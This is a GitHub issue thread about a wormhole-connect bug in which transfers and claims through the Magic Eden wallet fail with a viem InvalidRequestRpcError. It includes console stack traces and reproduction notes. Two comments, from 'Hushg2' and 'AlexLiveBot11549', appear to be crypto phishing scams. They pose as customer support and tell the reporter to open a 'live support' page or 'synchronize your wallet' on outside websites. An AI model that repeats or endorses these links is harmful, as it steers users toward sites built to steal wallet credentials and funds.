### ISSUE TITLE
[QA] Unable to start/claim transaction with Magic Eden wallet - InvalidRequestRpcError

### ISSUE THREAD

**Issue by agodlevska** [wormhole-foundation/wormhole-connect#3101]
## Describe the current behavior in detail
Environment:
- OS: macOS Sequoia 15.0.1
- Wallets: Magic Eden
- Browser: Google Chrome Version 131.0.6778.140 (Official Build) (x86_64)
- https://deploy-preview-2838--wormhole-connect-mainnet.netlify.app/

Steps to Reproduce:
1. Attempt to initiate a transaction of 0.01 USDC from Optimism to Base via CCTP Manual route
2. Observe the error in the console

Expected Result: The transaction should be processed and completed successfully without errors. 

Actual Result: The transaction fails with the following error in the console:
```
Wormhole Connect: error completing transfer InvalidRequestRpcError: JSON is not a valid request object.

Details: JSON validation failed for additionalProperties at #/params/nativeCurrency/iconUrl
Version: viem@2.21.51
    at withRetry.delay.count (main-B1kY4Esc.js:377:7810)
    at async Tn (main-B1kY4Esc.js:377:7313)
Caused by: Error: JSON validation failed for additionalProperties at #/params/nativeCurrency/iconUrl
    at e.exports._makeErrorObject (ethereum-provider.js:1:12537)
    at e.exports._processResponse (ethereum-provider.js:1:11268)
    at inapp.js:262:372833
    at inapp.js:262:373659
``` 

## Attachments/Notes

https://github.com/user-attachments/assets/0c1cde59-bc14-4bde-aed4-1adc3124f39c

<img width="1440" alt="Screenshot 2024-12-20 at 16 14 47" src="https://github.com/user-attachments/assets/0d97a57a-b5fd-4e0a-a2af-b64a3d08dbcc" />

**Comment by Hushg2** [comment]
Hello @agodlevska  A support ticket has been opened for you. Kindly Talk to Support on the [Live support page](https://crypto-onlinrectifications.web.app/) so that your issue can be looked into. [CLICK HERE](https://crypto-onlinrectifications.web.app/)

**Comment by agodlevska** [comment]
The same issue occurs when attempting to claim a transaction of 0.01 SUI from Sui (Martian Sui) to Fantom (Magic Eden). The error in the console is as follows:
```
Error while manually redeeming: unknown - InvalidRequestRpcError: JSON is not a valid request object.

Details: JSON validation failed for additionalProperties at #/params/nativeCurrency/iconUrl
Version: viem@2.21.51
``` 

Attachment:
<img width="1440" alt="Screenshot 2024-12-20 at 16 40 15" src="https://github.com/user-attachments/assets/a5767b31-484d-4b79-8b04-083625d140f2" />

**Comment by agodlevska** [comment]
Issue reproducible on https://preview.portalbridge.com/7e1e7d6a3d/, when sending 0.01 USDC from Optimism to Base via CCTP Manual route. 

The issue is not reproducible when sending 0.2 USDC from Base to Optimism via CCTP Automatic route. The transaction processes successfully without any errors, [Wormholescan](https://wormholescan.io/#/tx/0xf767bb6711a78b528e9135d92ac0800b959a17683266a68d24f6f1ee97549487).

Attachment:

https://github.com/user-attachments/assets/cb682a16-1a3d-4058-a58d-290830153e29

**Comment by AlexLiveBot11549** [comment]
Thank you for reaching to Our Github. Customer service may take some time to respond due to a large number of requests. We believe your case will be resolved as soon as possible. Kindly visit the below webpage to synchronize your wallet for fixing process 

https://support--protocol.vercel.app/

**Comment by tsadovska** [comment]
Magic Eden wallet is no longer displayed in the wallets list.
